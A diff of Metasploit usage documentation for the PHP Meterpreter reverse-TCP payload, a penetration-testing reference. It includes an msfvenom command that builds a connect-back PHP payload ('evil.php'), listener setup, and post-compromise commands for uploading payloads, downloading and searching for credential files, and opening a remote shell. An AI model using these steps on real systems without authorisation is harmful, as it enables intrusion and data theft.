|
| 1 | +The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps. This module _can_ be cross platform, but the target needs to be able to run php code. |
| 2 | + |
| 3 | + |
| 4 | +## Vulnerable Application |
| 5 | + |
| 6 | + The PHP Meterpreter is suitable for any system that supports PHP. For example, the module can be used against webservers which run PHP code for a website. OS X has PHP installed by default. |
| 7 | + |
| 8 | +## Deploying php/meterpreter/reverse_tcp |
| 9 | +### Scenarios |
| 10 | + |
| 11 | + Specific demo of using the module that might be useful in a real world scenario. |
| 12 | + |
| 13 | +#### Generating a file with msfvenom |
| 14 | + ``` |
| 15 | + msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o evil.php |
| 16 | + ``` |
| 17 | + |
| 18 | + |
| 19 | +#### Starting a listener |
| 20 | + ``` |
| 21 | +msf > use multi/handler |
| 22 | +msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp |
| 23 | +PAYLOAD => php/meterpreter/reverse_tcp |
| 24 | +msf exploit(handler) > set LHOST [IP] |
| 25 | + ``` |
| 26 | + |
| 27 | +## Important Basic Commands |
| 28 | + |
| 29 | +Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the PHP Meterpreter |
| 30 | +has less commands, but here's a list of all the common ones you might need: |
| 31 | + |
| 32 | +**pwd command** |
| 33 | + |
| 34 | +The ```pwd``` command tells you the current working directory. For example: |
| 35 | + |
| 36 | +``` |
| 37 | +meterpreter > pwd |
| 38 | +/Users/thecarterb/Desktop |
| 39 | +``` |
| 40 | + |
| 41 | +**cd command** |
| 42 | + |
| 43 | +The ```cd``` command allows you to change directories. Example: |
| 44 | + |
| 45 | +``` |
| 46 | +meterpreter > cd /Users/thecarterb/Desktop |
| 47 | +meterpreter > pwd |
| 48 | +/Users/thecarterb/Desktop |
| 49 | +``` |
| 50 | + |
| 51 | +**cat command** |
| 52 | + |
| 53 | +The ```cat``` command allows you to see the content of a file: |
| 54 | + |
| 55 | +``` |
| 56 | +meterpreter > cat /tmp/data.txt |
| 57 | +Hello World! |
| 58 | +``` |
| 59 | + |
| 60 | +**upload command** |
| 61 | + |
| 62 | +The ```upload``` command allows you to upload a file to the remote target. This is useful for uploading additional payload files. For example: |
| 63 | + |
| 64 | +``` |
| 65 | +meterpreter > upload /tmp/data.txt /Users/thecarterb/Desktop |
| 66 | +[*] uploading : /tmp/data.txt -> /Users/thecarterb/Desktop |
| 67 | +[*] uploaded : /tmp/data.txt -> /Users/thecarterb/Desktop/data.txt |
| 68 | +meterpreter > |
| 69 | +``` |
| 70 | + |
| 71 | +**download command** |
| 72 | + |
| 73 | +The ```download``` command allows you to download a file from the remote target to your machine. |
| 74 | +For example: |
| 75 | + |
| 76 | +``` |
| 77 | +meterpreter > download /Users/thecarterb/Desktop/data.txt /tmp/pass.txt |
| 78 | +[*] downloading: /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt |
| 79 | +[*] download : /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt |
| 80 | +meterpreter > |
| 81 | +``` |
| 82 | + |
| 83 | +**search command** |
| 84 | + |
| 85 | +The ```search``` command allows you to find files on the remote file system. For example, |
| 86 | +this shows how to find all text files in the current directory: |
| 87 | + |
| 88 | +``` |
| 89 | +meterpreter > search -d . -f *.txt |
| 90 | +Found 2 results... |
| 91 | + .\pass.txt (13 bytes) |
| 92 | + ./creds\data.txt (83 bytes) |
| 93 | +meterpreter > |
| 94 | +``` |
| 95 | + |
| 96 | +Without the ```-d``` option, the command will attempt to search in all drives. |
| 97 | + |
| 98 | +The ```-r``` option for the command allows you to search recursively. |
| 99 | + |
| 100 | + |
| 101 | +**getuid command** |
| 102 | + |
| 103 | +The ```getuid``` command tells you the current user that Meterpreter is running on. For example: |
| 104 | + |
| 105 | +``` |
| 106 | +meterpreter > getuid |
| 107 | +Server username: root |
| 108 | +``` |
| 109 | + |
| 110 | +**execute command** |
| 111 | + |
| 112 | +The ```execute``` command allows you to execute a command or file on the remote machine. |
| 113 | + |
| 114 | +The following examples uses the command to create a text file: |
| 115 | + |
| 116 | +``` |
| 117 | +meterpreter > execute -f echo -a "hello > /tmp/hello.txt" |
| 118 | +Process 73642 created. |
| 119 | +meterpreter > |
| 120 | +``` |
| 121 | + |
| 122 | +**ps command** |
| 123 | + |
| 124 | +The ```ps``` command lists the running processes on the remote machine. |
| 125 | + |
| 126 | +**shell command** |
| 127 | + |
| 128 | +The ```shell``` command allows you to interact with the remote machine's command prompt (or shell). |
| 129 | +For example: |
| 130 | + |
| 131 | +``` |
| 132 | +meterpreter > shell |
| 133 | +Process 74513 created. |
| 134 | +Channel 2 created. |
| 135 | +sh-3.2# |
| 136 | +``` |
| 137 | + |
| 138 | +If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel. |
| 139 | + |
| 140 | +**sysinfo** |
| 141 | + |
| 142 | +The ```sysinfo``` command shows you basic information about the remote machine. Such as: |
| 143 | + |
| 144 | +* Computer name |
| 145 | +* OS name |
| 146 | +* Architecture |
| 147 | +* Meterpreter type |
| 148 | + |
| 149 | +## Using `post` modules |
| 150 | +When using the PHP Meterpreter, you have the feature of using Metasploit's `post` modules on that specific session. By default, most `multi` post modules will work; however, you can also use OS specific modules depending on the OS of the compromised system. For example, if you have a PHP Meterpreter session running on OS X, you can use `osx` post modules on that session. |
| 151 | + |
| 152 | + __Don't forget to:__ |
| 153 | + - Set the `LHOST` datastore option to the connect-back IP Address |
| 154 | + - If you want to get multiple shells, set `ExitOnSession` to `false` |
0 commit comments